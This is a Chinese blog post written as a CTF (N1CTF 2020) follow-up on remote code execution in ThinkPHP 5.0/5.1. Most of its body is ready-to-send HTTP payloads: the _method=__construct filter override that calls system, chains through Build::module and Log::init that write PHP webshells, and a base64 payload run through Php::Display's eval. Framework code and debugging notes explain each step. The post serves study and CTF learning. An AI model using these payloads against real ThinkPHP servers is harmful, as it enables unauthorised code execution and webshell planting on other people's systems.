<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-cn">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="web,thinkphp5,代码审计," />










<meta name="description" content="前言 周末摸了下N1ctf，a了一道web签到，一道渗透题，卡了一道tp5rce的利用。所以想通过这次机会复现一下tp5 rce，然后看下tp5其他的rce方式。  赛后针对payload的一些复现和思考 Thinkphp5的一些基本配置信息  thinkphp的路由模式总共有3种 普通模式 url_route_on&#x3D;false，在这个模式下关闭路由，只能使用路径的模式来访问控制器。类似于inde">
<meta property="og:type" content="article">
<meta property="og:title" content="tp5.0_rce研究">
<meta property="og:url" content="http://www.star123.top/2020/10/22/tp5-0-rce%E7%A0%94%E7%A9%B6/index.html">
<meta property="og:site_name" content="star&#39;s blog">
<meta property="og:description" content="前言 周末摸了下N1ctf，a了一道web签到，一道渗透题，卡了一道tp5rce的利用。所以想通过这次机会复现一下tp5 rce，然后看下tp5其他的rce方式。  赛后针对payload的一些复现和思考 Thinkphp5的一些基本配置信息  thinkphp的路由模式总共有3种 普通模式 url_route_on&#x3D;false，在这个模式下关闭路由，只能使用路径的模式来访问控制器。类似于inde">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://i.loli.net/2020/10/24/GTceKsk8mLNq3DW.png">
<meta property="og:image" content="https://i.loli.net/2020/10/24/8SOspzn9IN3mHJL.png">
<meta property="og:image" content="https://i.loli.net/2020/10/24/LeHhBxYXJgd6VqM.png">
<meta property="og:image" content="https://i.loli.net/2020/10/24/7xIcRlkuipvb5ZP.png">
<meta property="og:image" content="https://i.loli.net/2020/10/24/5foFyYApnQJ8bzD.png">
<meta property="og:image" content="https://i.loli.net/2020/10/29/WPTNtM5c4EmXIHD.png">
<meta property="og:image" content="https://i.loli.net/2020/10/30/TEf3zDHmFJwGncA.png">
<meta property="og:image" content="https://i.loli.net/2020/11/02/xVJoMkln7RuK9id.png">
<meta property="og:image" content="https://i.loli.net/2020/11/02/KkLsQBdhIunJUOW.png">
<meta property="og:image" content="https://i.loli.net/2020/11/02/ZloDU1wPMj2rnBk.png">
<meta property="og:image" content="https://i.loli.net/2020/11/02/K1TxLStXvVhHY5e.png">
<meta property="article:published_time" content="2020-10-22T15:26:06.000Z">
<meta property="article:modified_time" content="2020-11-02T15:44:06.860Z">
<meta property="article:author" content="star">
<meta property="article:tag" content="web">
<meta property="article:tag" content="thinkphp5">
<meta property="article:tag" content="代码审计">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2020/10/24/GTceKsk8mLNq3DW.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://www.star123.top/2020/10/22/tp5-0-rce研究/"/>





  <title>tp5.0_rce研究 | star's blog</title>
  








<meta name="generator" content="Hexo 4.2.1"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-cn">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">star's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://www.star123.top/2020/10/22/tp5-0-rce%E7%A0%94%E7%A9%B6/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="star">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="star's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">tp5.0_rce研究</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-10-22T23:26:06+08:00">
                2020-10-22
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><ul>
<li>周末摸了下N1ctf，a了一道web签到，一道渗透题，卡了一道tp5rce的利用。所以想通过这次机会复现一下tp5 rce，然后看下tp5其他的rce方式。</li>
</ul>
<h2 id="赛后针对payload的一些复现和思考"><a href="#赛后针对payload的一些复现和思考" class="headerlink" title="赛后针对payload的一些复现和思考"></a>赛后针对payload的一些复现和思考</h2><ol>
<li><p>Thinkphp5的一些基本配置信息</p>
<ul>
<li>thinkphp的路由模式总共有3种<ol>
<li>普通模式 url_route_on=false，在这个模式下关闭路由，只能使用路径的模式来访问控制器。类似于index.php/module/controller/method/</li>
<li>混合模式 url_route_on=true url_route_must=false，在这个模式下既支持使用path来访问控制器和方法又支持使用兼容模式var_pathinfo（默认变量名为s）。</li>
<li>强制模式 url_route_must=true url_route_on=true，仅仅只能使用s=xxx来访问相应模块。</li>
</ol>
</li>
<li>log日志项默认值的type应该是File</li>
</ul>
</li>
<li><p>在未开启强制路由的情况下，用户可以调用任何方法。payload如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"># ThinkPHP &lt;&#x3D; 5.0.13</span><br><span class="line">POST &#x2F;?s&#x3D;index&#x2F;index</span><br><span class="line">s&#x3D;whoami&amp;_method&#x3D;__construct&amp;method&#x3D;&amp;filter[]&#x3D;system</span><br><span class="line"></span><br><span class="line"># ThinkPHP &lt;&#x3D; 5.0.23、5.1.0 &lt;&#x3D; 5.1.16 需要开启框架app_debug</span><br><span class="line">POST &#x2F;</span><br><span class="line">_method&#x3D;__construct&amp;filter[]&#x3D;system&amp;server[REQUEST_METHOD]&#x3D;ls -al</span><br><span class="line"></span><br><span class="line"># ThinkPHP &lt;&#x3D; 5.0.23 需要存在xxx的method路由，例如captcha</span><br><span class="line">POST &#x2F;?s&#x3D;xxx HTTP&#x2F;1.1</span><br><span class="line">_method&#x3D;__construct&amp;filter[]&#x3D;system&amp;method&#x3D;get&amp;get[]&#x3D;ls+-al</span><br><span class="line">_method&#x3D;__construct&amp;filter[]&#x3D;system&amp;method&#x3D;get&amp;server[REQUEST_METHOD]&#x3D;ls</span><br></pre></td></tr></table></figure>

<p>​        我们直接debug跟一遍。</p>
<p>​        这里解释下，在tp中s就是代表pathinfo的变量，使用这个变量和直接使用<code>模块/控制器/方法</code>是一样的。在tp5.0.24以前，可以通过覆盖method变量来调用任意方法。这里默认var_method的值就是_method。</p>
<p><img src="https://i.loli.net/2020/10/24/GTceKsk8mLNq3DW.png"></p>
<p>​        这里只能调用Request类的方法，因为这个方法需要兼容array类型的变量，所以只能是__construct方法。</p>
<p>​    <img src="https://i.loli.net/2020/10/24/8SOspzn9IN3mHJL.png"></p>
<p>​        这里主要是覆盖了几个Request类的参数，可以先放放，继续往下看。一直往下单步。</p>
<p><img src="https://i.loli.net/2020/10/24/LeHhBxYXJgd6VqM.png"></p>
<p>​        这里如果没有开app_debug模式的情况下，需要覆盖method变量，让method获取一个合理的method。然后继续往下跟。</p>
<p><img src="https://i.loli.net/2020/10/24/7xIcRlkuipvb5ZP.png"></p>
<p>​        因为array_walk_recursive的存在，所以data没法作为数组传入，所以最终在filterValue中利用call_user_func的时候只能调用单参数函数闭包。</p>
<p><img src="https://i.loli.net/2020/10/24/5foFyYApnQJ8bzD.png"></p>
<p>​        在php7的低版本中assert是可以使用的，但是高版本中assert没法被动态调用。所以在disable_func过滤地比较严格时候一个思路就是寻找本地可利用的静态方法。</p>
<ul>
<li><p>think\Lang::load ，think__include_file(未修改过的)方法也可以包含文件。</p>
<p><img src="https://i.loli.net/2020/10/29/WPTNtM5c4EmXIHD.png"></p>
</li>
<li><p>think\Build::module 方法能调用buildHello和buildCommon等有可控file_put_contents的函数，可以写文件。</p>
<p>我们来看下这个链，主要是think/Build::module函数包含buildHello函数，并且该函数有file_put_contents，其中module可控，可以写入内容。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="function"><span class="keyword">function</span> <span class="title">module</span><span class="params">($module = <span class="string">''</span>, $list = [], $namespace = <span class="string">'app'</span>, $suffix = false)</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        $module = $module ? $module : <span class="string">''</span>;</span><br><span class="line">        <span class="keyword">if</span> (!is_dir(APP_PATH . $module)) &#123;</span><br><span class="line">            <span class="comment">// 创建模块目录</span></span><br><span class="line">            mkdir(APP_PATH . $module);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (basename(RUNTIME_PATH) != $module) &#123;</span><br><span class="line">            <span class="comment">// 创建配置文件和公共文件</span></span><br><span class="line">            <span class="keyword">self</span>::buildCommon($module);</span><br><span class="line">            <span class="comment">// 创建模块的默认页面</span></span><br><span class="line">            <span class="keyword">self</span>::buildHello($module, $namespace, $suffix);</span><br><span class="line">        &#125;</span><br><span class="line">  			.....</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">protected</span> <span class="keyword">static</span> <span class="function"><span class="keyword">function</span> <span class="title">buildHello</span><span class="params">($module, $namespace, $suffix = false)</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        $filename = APP_PATH . ($module ? $module . DS : <span class="string">''</span>) . <span class="string">'controller'</span> . DS . <span class="string">'Index'</span> . ($suffix ? <span class="string">'Controller'</span> : <span class="string">''</span>) . EXT;</span><br><span class="line">        <span class="keyword">if</span> (!is_file($filename)) &#123;</span><br><span class="line">            $content = file_get_contents(THINK_PATH . <span class="string">'tpl'</span> . DS . <span class="string">'default_index.tpl'</span>);</span><br><span class="line">            $content = str_replace([<span class="string">'&#123;$app&#125;'</span>, <span class="string">'&#123;$module&#125;'</span>, <span class="string">'&#123;layer&#125;'</span>, <span class="string">'&#123;$suffix&#125;'</span>], [$namespace, $module ? $module . <span class="string">'\\'</span> : <span class="string">''</span>, <span class="string">'controller'</span>, $suffix ? <span class="string">'Controller'</span> : <span class="string">''</span>], $content);</span><br><span class="line">            <span class="keyword">if</span> (!is_dir(dirname($filename))) &#123;</span><br><span class="line">                mkdir(dirname($filename), <span class="number">0755</span>, <span class="keyword">true</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            file_put_contents($filename, $content);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">namespace</span> &#123;$<span class="title">app</span>&#125;\&#123;$<span class="title">module</span>&#125;&#123;<span class="title">layer</span>&#125;;</span><br></pre></td></tr></table></figure>

<p>Index.tpl 中module是我们可控的部分，这里可以被替换为恶意代码，但问题是，如何构造一个可靠的目录绕过mkdir。在*nix下的使用mkdir时，如果出现类似于mkdir(“sasa/../“)这样的代码时，如果sasa不存在，系统是会抛出warmming，但是，file_put_contents却能处理这种格式的路径，并写文件。</p>
<p><img src="https://i.loli.net/2020/10/30/TEf3zDHmFJwGncA.png"></p>
<p>但是，注意到最后一部分mkdir第三个参数是被设置为true，创建目录为递归模式，可以对路径做规范化，最终表现为创建本层次的sa目录。</p>
<p>最后我们可以设置error_reporting为0来使得tp放过抛错，继续运行。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="function"><span class="keyword">function</span> <span class="title">appError</span><span class="params">($errno, $errstr, $errfile = <span class="string">''</span>, $errline = <span class="number">0</span>, $errcontext = [])</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        $exception = <span class="keyword">new</span> ErrorException($errno, $errstr, $errfile, $errline, $errcontext);</span><br><span class="line">        <span class="keyword">if</span> (error_reporting() &amp; $errno) &#123;</span><br><span class="line">            <span class="comment">// 将错误信息托管至 think\exception\ErrorException</span></span><br><span class="line">            <span class="keyword">throw</span> $exception;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">self</span>::getExceptionHandler()-&gt;report($exception);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>



</li>
</ul>
</li>
</ol>
<pre><code>  最终payload（需要一提的是这里error_reporting的参数设置为0结尾的路径时利用了php的弱类型，参数传入error_reporting时为0，在mkdir时为原路径）

  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">_method&#x3D;__construct&amp;method&#x3D;GET&amp;server[]&#x3D;1&amp;filter[1]&#x3D;think\Build::module&amp;filter[0]&#x3D;error_reporting&amp;get[0]&#x3D;..&#x2F;public&#x2F;0&amp;get[1]&#x3D;a;&quot;&#x2F;..&#x2F;..&#x2F;public&#x2F;test&quot;.eval($_POST[1]);&#x2F;&#x2F;</span><br></pre></td></tr></table></figure>

  ![](https://i.loli.net/2020/10/30/kA5anQX19L6tNh7.png)

  当然，这里也其实有很多别的办法，比如说通过伪协议写入rot13编码的shell，然后再依靠任意文件包含加上伪协议读取出来也可以的。

  (这里因为有太多base64处理不了的字符所以直接包含base64解码的结果很难)

  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">b&#x3D;..&#x2F;public&#x2F;.&#x2F;&lt;?cuc riny(trgnyyurnqref()[&quot;pzq&quot;]);？&gt;&amp;_method&#x3D;__construct&amp;filter[]&#x3D;think\Build::module&amp;a&#x3D;1&amp;method&#x3D;GET</span><br></pre></td></tr></table></figure>

- think\Log::init 方法，可以初始化日志类，该类可以重新设置日志的路径，可以在某些场合写shell。

  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">_method&#x3D;__construct&amp;filter[]&#x3D;json_decode&amp;filter[]&#x3D;get_object_vars&amp;filter[]&#x3D;think\Log::init&amp;method&#x3D;GET&amp;get[]&#x3D;&#123;&quot;type&quot;:&quot;File&quot;, &quot;path&quot;:&quot;&#x2F;xxxx&#x2F;log&#x2F;&quot;&#125;</span><br></pre></td></tr></table></figure>

  然后改下url，比如url=`&lt;?php phpinfo();?&gt;`,(需要urldeode一下)，主要通过error_log函数写日志。

  ![](https://i.loli.net/2020/11/02/uA2eWEwgmZsRFLk.png)

  之后用前面提到的文件包含思路即可。

- unserialize 利用tp的反序列化，参考tp低版本反序列化。

- 利用display方法，需要知道，php是允许采用静态的方式调用静态方法的，但是会爆warming，做一些额外的操作。

  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">filter[]&#x3D;set_error_handler&amp;filter[]&#x3D;self::path&amp;filter[]&#x3D;base64_decode&amp;filter[]&#x3D;\think\view\driver\Php::Display&amp;method&#x3D;GET&amp;path&#x3D;PD9waHAgZmlsZV9wdXRfY29udGVudHMoIi90bXAvdGVzdC5waHAiLCI8P3BocCBlaGNvIG1kNSgxKTs%2FPiIpOz8%2BCg%3D%3D&amp;_method&#x3D;__construct</span><br></pre></td></tr></table></figure>

  1. 首先我们看到set_error_handler，可以接收一个callable类型的变量，通过设置参数位置，我们可以把set_error_handler放在参数的第一位。这里的作用是抑制抛错(采用另外一个函数来处理报错，按照这里的函数调用顺序，应该是set_error_handler自己)，当然这里我们也可以通过设置error_reporting的值来处理这个问题，这个后面会提。

     ![](https://i.loli.net/2020/11/02/KxdOstAIQBup1oG.png)

     <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="function"><span class="keyword">function</span> <span class="title">appError</span><span class="params">($errno, $errstr, $errfile = <span class="string">''</span>, $errline = <span class="number">0</span>, $errcontext = [])</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        $exception = <span class="keyword">new</span> ErrorException($errno, $errstr, $errfile, $errline, $errcontext);</span><br><span class="line">        <span class="keyword">if</span> (error_reporting() &amp; $errno) &#123;</span><br><span class="line">            <span class="comment">// 将错误信息托管至 think\exception\ErrorException</span></span><br><span class="line">            <span class="keyword">throw</span> $exception;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">self</span>::getExceptionHandler()-&gt;report($exception);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>



  2. self::path方法调用本地的path方法，这里需要一提的是php函数传参只能多不能少，所以可以给一个0参数函数传入一个参数，这里我们回忆下之前在__construct的全局变量覆盖path变量已经被赋值了，所以直接过。

     <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">path</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (is_null(<span class="keyword">$this</span>-&gt;path)) &#123;</span><br><span class="line">            $suffix   = Config::get(<span class="string">'url_html_suffix'</span>);</span><br><span class="line">            $pathinfo = <span class="keyword">$this</span>-&gt;pathinfo();</span><br><span class="line">            <span class="keyword">if</span> (<span class="keyword">false</span> === $suffix) &#123;</span><br><span class="line">                <span class="comment">// 禁止伪静态访问</span></span><br><span class="line">                <span class="keyword">$this</span>-&gt;path = $pathinfo;</span><br><span class="line">            &#125; <span class="keyword">elseif</span> ($suffix) &#123;</span><br><span class="line">                <span class="comment">// 去除正常的URL后缀</span></span><br><span class="line">                <span class="keyword">$this</span>-&gt;path = preg_replace(<span class="string">'/\.('</span> . ltrim($suffix, <span class="string">'.'</span>) . <span class="string">')$/i'</span>, <span class="string">''</span>, $pathinfo);</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                <span class="comment">// 允许任何后缀访问</span></span><br><span class="line">                <span class="keyword">$this</span>-&gt;path = preg_replace(<span class="string">'/\.'</span> . <span class="keyword">$this</span>-&gt;ext() . <span class="string">'$/i'</span>, <span class="string">''</span>, $pathinfo);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">         <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;path;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>



  3. base64解码payload `&lt;?php file_put_contents(&quot;/tmp/test.php&quot;,&quot;&lt;?php ehco md5(1);?&gt;`

  4. 最后跟入display方法，舒舒服服，eval执行代码。

     <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">display</span><span class="params">($content, $data = [])</span></span></span><br><span class="line"><span class="function">   </span>&#123;</span><br><span class="line">       <span class="keyword">if</span> (<span class="keyword">isset</span>($data[<span class="string">'content'</span>])) &#123;</span><br><span class="line">           $__content__ = $content;</span><br><span class="line">           extract($data, EXTR_OVERWRITE);</span><br><span class="line">           <span class="keyword">eval</span>(<span class="string">'?&gt;'</span> . $__content__);</span><br><span class="line">       &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">           extract($data, EXTR_OVERWRITE);</span><br><span class="line">           <span class="keyword">eval</span>(<span class="string">'?&gt;'</span> . $content);</span><br><span class="line">       &#125;</span><br><span class="line">   &#125;</span><br></pre></td></tr></table></figure>



  5. 这个做法的关键是在于在appError抑制向外抛出错误，还有一种做法就是关闭error_reporting，将其设为0即可，还是设置下参数的位置，第一个参数为0就好。error_reporting(0)=&gt;self::path(xxx)=&gt;后面都一样了。

     <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a&#x3D;0&amp;filter[]&#x3D;error_reporting&amp;filter[]&#x3D;self::path&amp;filter[]&#x3D;base64_decode&amp;filter[]&#x3D;\think\view\driver\Php::Display&amp;method&#x3D;GET&amp;path&#x3D;PD9waHAgZmlsZV9wdXRfY29udGVudHMoIi90bXAvdGVzdC5waHAiLCI8P3BocCBlaGNvIG1kNSgxKTs%2FPiIpOz8%2BCg%3D%3D&amp;_method&#x3D;__construct</span><br></pre></td></tr></table></figure></code></pre>
<ol start="3">
<li><p>Tp5.0，5.1下面的另外一个rce，这个主要是由于对控制器解析的错误引起的。</p>
<p><code>[library/think/route/dispatch/Module.php](https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815#diff-1a244c60299c5674fbeee4a6165f84512bdb109c080509b7f951b5353e47d876) </code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 是否自动转换控制器和操作名</span></span><br><span class="line"><span class="comment">//$convert = is_bool($this-&gt;convert) ? $this-&gt;convert : $this-&gt;rule-&gt;getConfig('url_convert');</span></span><br><span class="line"><span class="comment">// 获取控制器名</span></span><br><span class="line">$controller       = strip_tags($result[<span class="number">1</span>] ?: <span class="keyword">$this</span>-&gt;rule-&gt;getConfig(<span class="string">'default_controller'</span>));</span><br><span class="line">$controller = strip_tags($result[<span class="number">1</span>] ?: <span class="keyword">$this</span>-&gt;rule-&gt;getConfig(<span class="string">'default_controller'</span>));</span><br><span class="line">      </span><br><span class="line"><span class="keyword">if</span> (!preg_match(<span class="string">'/^[A-Za-z](\w)*$/'</span>, $controller)) &#123;</span><br><span class="line">    <span class="keyword">throw</span> <span class="keyword">new</span> HttpException(<span class="number">404</span>, <span class="string">'controller not exists:'</span> . $controller);</span><br><span class="line">&#125;</span><br><span class="line">      </span><br><span class="line"><span class="keyword">$this</span>-&gt;controller = $convert ? strtolower($controller) : $controller;</span><br></pre></td></tr></table></figure>

<p>被注释掉的是，原本的代码。</p>
<p>我们简单地跟一下</p>
<p><img src="https://i.loli.net/2020/11/02/xVJoMkln7RuK9id.png"></p>
<p>跟进去发现直接根据/来区分controller和action，然后controller又是任意加载的，这样很容易调用任意内部方法。</p>
<p><img src="https://i.loli.net/2020/11/02/KkLsQBdhIunJUOW.png"></p>
<p><img src="https://i.loli.net/2020/11/02/ZloDU1wPMj2rnBk.png"></p>
<p><img src="https://i.loli.net/2020/11/02/K1TxLStXvVhHY5e.png"></p>
<p>获取controller名和action名，实现任意内部方法调用。</p>
</li>
</ol>
<h2 id="小小的反思"><a href="#小小的反思" class="headerlink" title="小小的反思"></a>小小的反思</h2><p>这题没出的一个很大的原因是思路没有及时切换过来，tp中的静态方法甚至动态方法都应该是可以利用的对象。赛后分析来说，很多例子都相当有意思，尤其是第五个做法。实际上简单地搜索了下，还有几个动态的include方法可以利用，但是正常情况下采取直接利用__include_file即可，所以看上去没啥用。然而虽然没出这道题，但是赛后的复现和查文档还是能让我学到了足够多的东西，这点大概是最令人欣慰的吧。</p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><ol>
<li><a href="https://github.com/hongriSec/PHP-Audit-Labs/blob/master/Part2/ThinkPHP5/ThinkPHP5%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B9%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C10.md" target="_blank" rel="noopener">thinkphpVul</a></li>
<li>[Nu1l offical wp] (<a href="https://github.com/Nu1LCTF/n1ctf-2020/blob/main/N1CTF2020%20Writeup%20By%20Nu1L.pdf" target="_blank" rel="noopener">https://github.com/Nu1LCTF/n1ctf-2020/blob/main/N1CTF2020%20Writeup%20By%20Nu1L.pdf</a>)</li>
</ol>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/web/" rel="tag"># web</a>
          
            <a href="/tags/thinkphp5/" rel="tag"># thinkphp5</a>
          
            <a href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" rel="tag"># 代码审计</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/09/14/php%E5%A4%8D%E6%9D%82%E5%8F%98%E9%87%8F%E7%9A%84%E5%BA%94%E7%94%A8/" rel="next" title="php复杂变量的应用">
                <i class="fa fa-chevron-left"></i> php复杂变量的应用
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
